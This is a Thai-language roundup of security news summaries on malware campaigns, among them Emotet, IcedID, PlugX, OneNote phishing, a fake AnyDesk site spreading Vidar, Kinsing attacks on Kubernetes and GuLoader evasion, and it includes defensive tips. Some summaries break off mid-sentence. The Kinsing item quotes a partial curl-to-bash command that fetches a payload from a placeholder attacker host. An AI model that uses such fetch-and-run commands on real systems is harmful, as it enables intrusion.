TricGate Packer ที่ถูกพัฒนาบนพื้นฐาน Shellcode ที่ประสบความสำเร็จจากการให้บริการในการช่วยผู้ไม่หวังดีหลาย ๆ กลุ่ม ในการซ่อนมัลแวร์อันตราย เช่น TrickBot, Emotet, AZORult, AgentTesla และ REvil จากการตรวจจับจากอุปกรณ์ Security โดยที่ไม่ถูกตรวจพบมาเลยกว่า 6 ปี (more…)

นักวิจัย Unit 42 จาก Palo Alto Network บริษัทด้านความปลอดภัย ได้ทำการวิเคราะห์มัลแวร์ PlugX สายพันธุ์ใหม่ ที่พบว่าสามารถซ่อนตัวใน USB รวมถึงโจมตีไปยังเครื่องผู้ใช้งาน Windows ที่เสียบ USB ที่มีมัลแวร์ตัวนี้ฝังอยู่ รวมถึงยังสามารถแพร่กระจายไปยัง USB อื่น ๆ ได้อีกด้วย

PlugX malware เป็นมัลแวร์ที่แฝงตัวมากับซอฟต์แวร์ที่ดูเหมือนปลอดภัย เพื่อโหลดเพย์โหลดอันตราย โดยถูกนำมาใช้ในการโจมตีตั้งแต่ปี 2008 เริ่มใช้โดย Hackers ชาวจีน ต่อมาผู้โจมตีกลุ่มอื่น ๆ ก็เริ่มนำมาใช้โจมตีเช่นกัน จึงทำให้ไม่สามารถระบุแหล่งที่มาได้ (more…)

มัลแวร์ Emotet ยังคงมีการปรับปรุงเทคนิคการโจมตีใหม่อย่างต่อเนื่อง ในขณะเดียวกันก็ยังคงทำหน้าที่เป็นช่องทางสำหรับติดตั้งมัลแวร์ตัวอื่น ๆ ด้วย เช่น Bumblebee และ IcedID

Malware-as-a-service (MaaS) ยังคงเป็นบริการยอดนิยมสำหรับผู้โจมตีในการขโมยข้อมูลสำคัญออกไป ภายหลังจากการเข้าควบคุมเครื่องเหยื่อได้สำเร็จ และล่าสุดมัลแวร์ยอดนิยมอย่าง Emotet มีการเพิ่มโมดูลใหม่ ซึ่งประกอบด้วย Spreader SMB ที่ออกแบบมาเพื่อการทำ lateral movement โดยการใช้ชื่อผู้ใช้ และรหัสผ่านที่ hard-coded ไว้ และ credit card stealer ที่มุ่งเป้าไปที่การขโมยข้อมูลบนเว็ปเบราว์เซอร์ Google Chrome (more…)

BleepingComputer พบว่า Hackers ได้ปรับเปลี่ยนวิธีการโจมตี โดยการหันมาใช้ Microsoft OneNote ที่ฝังมัลแวร์แนบไปกับ Phishing Email เพื่อเข้าถึงเครื่องเหยื่อจากระยะไกล รวมถึงติดตั้งเพย์โหลดที่เป็นอันตราย เพื่อขโมยไฟล์, รหัสผ่านที่บันทึกไว้บนเบราว์เซอร์, ข้อมูลกระเป๋าเงิน cryptocurrency, การบันทึกภาพหน้าจอ และบันทึกวิดีโอโดยใช้เว็บแคม

โดยการหันมาใช้ Microsoft OneNote ในการโจมตี เกิดขึ้นจากการที่ Microsoft ได้ปิดการใช้งาน macro เป็นค่าเริ่มต้นใน Microsoft Office ซึ่งมักจะเป็นวิธีที่ Hackers เรียกใช้สคริปต์เพื่อติดตั้งมัลแวร์ ทำให้ Hackers ไม่สามารถแพร่กระจายมัลแวร์ผ่านไฟล์แนบรูปแบบ Word และ Excel ได้ จึงต้องหาวิธีการโจมตีในรูปแบบอื่น ๆ มาใช้แทน

Microsoft OneNote ** เป็นแอปพลิเคชันสมุดบันทึกดิจิทัลบนเดสก์ท็อปที่สามารถดาวน์โหลดได้ฟรี และถูกรวมอยู่ใน Microsoft Office 2019 และ Microsoft 365 เนื่องจาก Microsoft OneNote เป็นแอปพลิเคชันที่ถูกติดตั้งโดยค่าเริ่มต้นจากการติดตั้ง Microsoft Office 365 ทำให้ถึงผู้ใช้ Windows จะไม่ได้ใช้แอปพลิเคชันนี้ ก็ยังสามารถเปิดไฟล์ได้

การโจมตีโดย OneNote

Trustwave SpiderLabs บริษัทด้านความปลอดภัยทางไซเบอร์ ได้พบการโจมตีด้วย Phishing Email ที่แนบไฟล์ OneNote ที่เป็นอันตราย ตั้งแต่ช่วงกลางเดือนธันวาคมที่ผ่านมา ซึ่งหัวข้อของ Phishing Email จะประกอบไปด้วยการแจ้งเตือนการจัดส่งของจาก DHL, ใบแจ้งหนี้, แบบฟอร์มการโอนเงินของ ACH, แบบร่าง mechanical และ เอกสารการจัดส่ง

โดยใน OneNote จะอนุญาตให้ผู้ใช้สามารถแทรกไฟล์แนบลงในโปรแกรม NoteBook ได้ ซึ่งเมื่อดับเบิลคลิกจะเป็นการเปิดไฟล์แนบขึ้นมา Hacker จึงได้แนบไฟล์ VBS ที่เป็นอันตรายลงในโปรแกรม NoteBook ซึ่งจะเรียกใช้สคริปต์โดยอัตโนมัติเมื่อดับเบิลคลิก จากนั้นมันจะทำการดาวน์โหลดและติดตั้งมัลแวร์จากเซิร์ฟเวอร์ภายนอก

Hacker จะทำการสร้างไฟล์แนบที่ดูเหมือนไอคอนของไฟล์ใน OneNote ที่เขียนว่า ‘Double click to view file' เหนือไฟล์แนบ VBS ที่เป็นอันตราย ซึ่งมีไฟล์แนบหลายไฟล์ หากผู้ใช้ดับเบิลคลิกที่ใดก็ตามบนแถบ ก็จะเปิดใช้งานทันที

เมื่อเปิดใช้งานเอกสารแนบของ OneNote โปรแกรมจะเตือนว่า ‘การทำเช่นนั้นอาจเป็นอันตรายต่อคอมพิวเตอร์ และข้อมูลของคุณ’ แต่ส่วนใหญ่เหยื่อจะไม่ได้สนใจข้อความดังกล่าว และคลิกปุ่มตกลง

เมื่อคลิกปุ่มตกลงจะเป็นการเปิดสคริปต์ VBS เพื่อดาวน์โหลด และติดตั้งมัลแวร์บนอุปกรณ์ รวมถึงแสดงเอกสาร OneNote ปลอมเพื่อให้เหยื่อไม่สงสัย

นอกจากนี้ยังพบวิธีการโจมตีประเภทอื่น ๆ เช่นการส่ง Phishing Email ที่แนบไฟล์อิมเมจ ISO และไฟล์ ZIP ที่ใส่รหัสผ่าน และใช้ช่องโหว่บน Windows เพื่อหลบเลี่ยงการตรวจสอบจาก mark-of-the-web flags แต่ปัจจุบัน Microsoft ได้แก้ไขช่องโหว่ดังกล่าวไปแล้ว

การป้องกัน

ไม่เปิดอ่านไฟล์จาก E-mail ที่ไม่รู้จัก หรือไม่น่าเชื่อถือ
อ่านคำเตือนที่แสดงโดยระบบปฏิบัติการ หรือแอปพลิเคชันทุกครั้ง ก่อนกดตกลง

ที่มา : bleepingcomputer

Deep Instinct บริษัทด้านความปลอดภัยทางไซเบอร์ได้เผยแพร่การพบโทรจันการเข้าถึงจากระยะไกล (remote access trojans RAT) ของ StrRAT และ Ratty ได้ใช้แคมเปญใหม่โดยการใช้ไฟล์ polyglot MSI/JAR และ CAB/JAR เพื่อหลบเลี่ยงการตรวจจับจากเครื่องมือรักษาความปลอดภัย และ Anti-Virus ซึ่งเป็นที่น่าสนใจมากขึ้น เนื่องจาก StrRAT และ Ratty เป็น RAT malware ที่เคยถูกพบมานานแล้ว

polyglot files คือ ไฟล์หลากหลายภาษารวมกันในรูปแบบไฟล์ตั้งแต่สองรูปแบบขึ้นไป ซึ่ง Hackers ได้ใช้ไฟล์หลายภาษาที่ฝังคำสั่งที่เป็นอันตราย เพื่อหลบเลี่ยงการตรวจจับจากเครื่องมือรักษาความปลอดภัย และเรียกใช้โดยแอปพลิเคชันที่แตกต่างกันหลายรายการได้โดยไม่มีข้อผิดพลาด โดยล่าสุดที่พบการใช้วิธีการนี้ในการโจมตีคือ มัลแวร์ StrelaStealer ที่กำหนดเป้าหมายไปยังบัญชีผู้ใช้งาน Outlook และ Thunderbird

วิธีการโจมตี

Deep Instinct ได้อธิบายวิธีการโจมตีไว้ว่า ด้วยการรวมรูปแบบ JAR และ MSI ไว้ในไฟล์เดียว โดยไฟล์ JAR เป็นไฟล์ archive ที่จะถูกระบุโดยบันทึกที่ส่วนท้าย ในขณะที่ใน MSI ตัวระบุประเภทไฟล์คือ "magic header" ที่จุดเริ่มต้นของไฟล์ รูปแบบทั้งคู่นี้ทำให้สามารถดำเนินการเป็น MSI ใน Windows และดำเนินการเป็นไฟล์ JAR โดย Java runtime (JAR ไม่ใช่ไฟล์เรียกทำงานจึงไม่ได้รับการตรวจสอบจาก Anti-Virus ทำให้สามารถซ่อนคำสั่งที่เป็นอันตรายได้) รวมไปถึงการใช้การรวมรูปแบบ CAB/JAR แทน MSI เนื่องจากพวกเขามี magic header สำหรับการตีความประเภทไฟล์เช่นกัน

โดยพบว่า แคมเปญนี้ถูกเผยแพร่โดย Sendgrid และ URL shortening เช่น Cutt.

นักวิจัยของ Cybereason เผยข้อมูลการโจมตีของ IcedID Malware ที่สามารถเข้าถึง Active Directory Domain ได้ภายใน 24 ชั่วโมง หลักจากได้รับสิทธิ์การเข้าถึงในครั้งแรก รวมไปถึงตลอดการโจมตี Hacker ยังพยายามทำการค้นหาช่องโหว่อื่น ๆ, ขโมยข้อมูลประจำตัว, แพร่กระจายตัวโดยการใช้ Windows protocol และการใช้เครื่องมืออย่าง Cobalt Strike บนเครื่่องเหยื่อที่ถูกโจมตี

IcedID หรือที่รู้จักในชื่อ BokBot เริ่มต้นด้วยการเป็น banking trojan ในปี 2017 ก่อนจะพัฒนาเป็น dropper malware แบบเดียวกันกับ Emotet, TrickBot, Qakbot, Bumblebee และ Raspberry Robin

วิธีการโจมตี

นักวิจัยได้อธิบายการโจมตีของ IcedID ไว้ว่า มันจะเริ่มจากการส่งไฟล์อิมเมจ ISO ที่อยู่ในไฟล์ ZIP ซึ่งได้ฝัง payload อันตรายเอาไว้ไปหาเหยื่อ

เมื่อสามารถโจมตีเข้าไปยังระบบของเหยื่อได้แล้ว ก็จะสร้าง Process เพื่อฝังตัวเองในเครื่อง (Persistence) และทำการติดต่อกับเซิร์ฟเวอร์ภายนอกของ Hacker เพื่อดาวน์โหลด payload เพิ่มเติม เช่น Cobalt Strike Beacon สำหรับหาช่องโหว่อื่น ๆ บนระบบสำหรับการ lateral movement รวมไปถึงเครื่องมือภาษา C# ที่ชื่อว่า Rubeus เพื่อขโมยข้อมูลประจำตัว เพื่อยกระดับสิทธิ์ตัวเอง และแพร่กระจายไปยัง Windows Server เครื่องอื่น ๆ รวมไปถึงเพื่อการโจมตีแบบ DCSync ซึ่งจะทำให้ Hacker สามารถจำลอง domain controller ( DC ) และดึงข้อมูลประจำตัวของผู้ใช้งานทั้งหมดบนระบบ domain controllers ออกมาได้

รวมไปถึงการใช้เครื่องมืออื่น ๆ เป็นส่วนหนึ่งของการโจมตี ได้แก่ netscan.

ผู้เชี่ยวชาญจาก SEKOIA พบเคมเปญการโจมตีขนาดใหญ่ที่มีการใช้งานโดเมนกว่า 1,300 โดเมนในการปลอมเป็น Official Site ของโปรแกรมรีโมทที่ใช้งานกันแพร่หลายอย่าง AnyDesk โดยจะเปลี่ยนเส้นทางของผู้ใช้งานไปยัง Dropbox ที่ใช้สำหรับติดตั้งมัลแวร์ขโมยข้อมูลที่มีชื่อว่า Vidar ซึ่ง Host ทั้งหมดใช้มาจาก IP เดียวกันคือ 185.149.120[.]9

ปัจจุบันโดเมนส่วนใหญ่ยังคงออนไลน์อยู่ แต่ก็มีบางโดเมนถูกรายงาน และปิดโดยผู้ให้บริการ Hosting รวมไปถึงถูกบล็อกจาก AntiVirus นอกจากนี้ลิงก์ Dropbox ของเว็ปไซต์ที่เปิดอยู่จะไม่ทำงานอีกต่อไปเนื่องจากมีรายงานไฟล์ที่เป็นอันตรายไปยังผู้ให้บริการ อย่างไรก็ตามแคมเปญเหล่านี้ชี้ไปที่เว็ปไซต์ปลายทางเดียวกัน ทำให้ผู้โจมตีสามารถแก้ไขปัญหาได้โดยอัปเดต URL ดาวน์โหลดไปยังเว็ปไซต์อื่นแทน

ลักษณะการทำงาน

ในแคมเปญล่าสุดที่ค้นพบเว็ปไซต์ปลอมต์ต่าง ๆ จะทำการแจกจ่ายไฟล์ที่ชื่อ 'AnyDeskDownload.

Kinsing malware เป็น malware ที่มุ่งเป้าโจมไปที่ Linux environments เพื่อทำการ Cryptojacking โดยทีม Microsoft Defender for Cloud ได้สังเกตเห็นพฤติกรรม Initial access เทคนิคของ Kinsing malware ที่ใช้ในการโจมตี Kubernetes environments ซึ่งหลัก ๆ แบ่งออกได้เป็นสองวิธีดังนี้

วิธีที่ 1 Container Image มีช่องโหว่

Kinsing malware จะพยาม scan หา container ที่มีช่องโหว่ RCE (Remote Code Execution) ที่เคยมีการเปิดเผยต่อสาธารณะแล้ว ตัวอย่าง application ที่เคยโจมตีเช่น:

PHPUnit
Liferay
WebLogic
Wordpress

หลังจากที่ได้ Remote access แล้ว Kinsing จะใช้ shell command เพื่อทำการติดตั้ง malware

“/bin/bash -c (curl -s Attacker_IP/Payload_Name.

Guardio Labs และ Trend Micro บริษัทด้านความปลอดภัยได้เผยแพร่ข้อมูลเทคนิคการโจมตีของกลุ่ม Hackers ที่เริ่มหันมาใช้ Google Ads ในการหลอกล่อเป้าหมายที่กำลังค้นหาซอฟต์แวร์ เพื่อให้เหยื่อทำการดาวน์โหลดซอฟต์แวร์อันตรายที่ถูกฝังมัลแวร์ไว้โดยที่ไม่รู้ตัว

Google Ads เป็นแพลตฟอร์มช่วยโปรโมตโฆษณาบนหน้าเว็ปในการค้นหาของ Google เพื่อให้อยู่ในอันดับต้น ๆ ของรายการค้นหา ซึ่งมักจะถูกนำเสนอก่อนเว็ปไซต์ของคำค้นหา

วิธีการโจมตี

Guardio Labs และ Trend Micro ได้ค้นพบแคมเปญ typosquatting ซึ่งเป็นแคมเปญการโจมตีโดยใช้การจดโดนเมนปลอมใกล้เคียง เพื่อเลียนแบบหน้าเว็ปไซต์ของซอฟต์แวร์ยอดนิยมกว่า 200 โดเมน เช่น Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird และ Brave

รวมทั้งยังได้ใช้ Google Ads ในการโปรโมตโฆษณาหน้าเว็ปปลอมบนหน้าการค้นหาของ Google และให้ขึ้นมาอยู่ในอันดับต้น ๆ ของคำค้นหานั้น เมื่อเป้าหมายกดคลิกหน้าเว็ปไซต์ปลอมเพื่อทำการดาวน์โหลดซอฟต์แวร์ ก็จะเป็นการดาวน์โหลดซอฟต์แวร์ที่ถูกฝังเพย์โหลดที่เป็นอันตราย

โดยเพย์โหลดที่ฝังมากับซอฟต์แวร์จะทำการดาวน์โหลดมัลแวร์ซึ่งประกอบไปด้วย Raccoon Stealer, Vidar Stealer และ IcedID malware loader ซึ่งเพย์โหลดที่มาในรูปแบบ .ZIP หรือ .MSI จะถูกดาวน์โหลดจากบริการแชร์ไฟล์ต่าง ๆ เช่น GitHub, Dropbox หรือ Discord เพื่อหลีกเลี่ยงการตรวจจับของโปรแกรมป้องกันไวรัสบนเครื่องเป้าหมาย

รวมถึงเมื่อ Google ตรวจพบว่าเว็ปไซต์ที่ Google Ads เชื่อมโยงไว้นั้นเป็นอันตราย โฆษณานั้นจะถูกบล็อกและลบออก ดังนั้น Hackers จึงใช้เทคนิคเลี่ยงการตรวจสอบของ Google Ads ด้วยการหลอกล่อให้เป้าหมายคลิกโฆษณาไปยังเว็ปไซต์ที่ไม่มีอันตรายที่สร้างโดย Hackers ก่อน จากนั้นก็จะทำการปลี่ยนเส้นทางไปยังเว็ปไซต์ดาวน์โหลดซอฟต์แวร์อันตรายอีกครั้งหนึ่ง

วิธีการป้องกัน

ระมัดระวังการคลิกชมโฆษณาบน Google Ads / ตรวจสอบ URL ของลิงค์เว็ปไซต์ที่ต้องการค้นหา
เปิดใช้งานตัวบล็อกโฆษณาบนเว็บเบราว์เซอร์

ที่มา : bleepingcomputer

นักวิจัยด้านความปลอดภัยทางไซเบอร์จาก CrowdStrike ออกมาเปิดเผยการค้นพบเทคนิคใหม่ในชื่อ “Blindside” ซึ่งถูกใช้โดยมัลแวร์ที่มีชื่อว่า GuLoader ซึ่งสามารถหลีกเลี่ยงการตรวจจับ (Defense Evasion) จาก Security Software ได้

GuLoader หรือ CloudEyE เป็น Visual Basic Script (VBS) downloader ที่ถูกใช้เพื่อแพร่กระจายโทรจันที่ถูกควบคุมจากระยะไกล (Remote Access Trojans RAT) ในชื่อ Remcos รวมไปถึง JavaScript malware ที่มีชื่อว่า RATDispenser

วิธีการโจมตี

โดย Visual Basic Script (VBS) ที่ถูกออกแบบมาของ GuLoader จะเรียกใช้ shellcode ที่ฝังมาลงในหน่วยความจำบนเครื่องเหยื่อหลังจากผ่านกระบวนการตรวจสอบ และหลีกเลี่ยงการตรวจจับดังนี้

ทำการสแกนหน่วยความจำของค่าสตริงที่เกี่ยวข้องกับ virtual machine (VM) / virtualization software หากพบจะหยุดการทำงานของ shellcode
หลบหลีกการวิเคราะห์ และป้องกันการ debug ในระหว่างการดำเนินการ โดยจะแสดงข้อความ error message หากพบว่ากำลังถูกตรวจสอบ

จากนั้นจึงจะทำการดาวน์โหลด payload การติดตั้งโทรจันที่สามารถใช้ควบคุม สั่งการเครื่องเหยื่อจากระยะไกล (Remote Access Trojans RAT) เพื่อให้ Hacker สามารถโจมตี และสั่งการได้จากระยะไกลได้

รวมถึง CrowdStrike ยังพบว่า GuLoader ได้ใช้เทคนิคใหม่ที่เรียกว่า "Redundant Code Injection Mechanism" หรือที่ถูกเรียกในชื่อ “Blindside” เพื่อหลีกเลี่ยง NTDLL.dll hooking ซึ่งเป็นเทคนิคที่ endpoint detection and response (EDR) ใช้ในการตรวจับ process ที่น่าสงสัยบน Windows โดยการตรวจสอบจาก windows API

ซึ่ง Cymulate บริษัทด้านความปลอดภัยทางไซเบอร์ได้เผยแพร่ตัวอย่างการโจมตี (PoC) ออกมาแล้วในปัจจุบัน

ที่มา : thehackernews